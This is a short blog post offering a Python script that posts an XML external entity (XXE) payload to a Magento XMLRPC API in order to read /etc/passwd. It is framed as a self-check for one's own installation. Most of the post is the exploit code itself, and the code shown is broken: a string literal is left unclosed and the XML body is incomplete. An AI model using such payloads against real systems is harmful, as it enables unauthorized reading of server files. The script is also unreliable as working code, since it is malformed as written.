Exploit Magento Zend Vulnerability


    If you want to check your magento installation whether it was affected by the XXE injection inside XMLRPC API I will show you my short pythonscript for it. For that you'll need Python/Requests. And the following script which you might need to configure for your installation:

    import requests
    url = ''
    filename ="/etc/passwd"
    data = """<?xml version="1.0"?>
     <!DOCTYPE foo [
      <!ELEMENT methodName ANY >
      <!ENTITY xxe SYSTEM "file://"""+filename+"""">]>
    print data
    r = requests.post(url, data=data)
    print r.text

    It doesn't look like much, but the hard part was to find out, how to post data in a non html-form like way.

    My own tests with this showed me, that nearly no file is accessible from outside.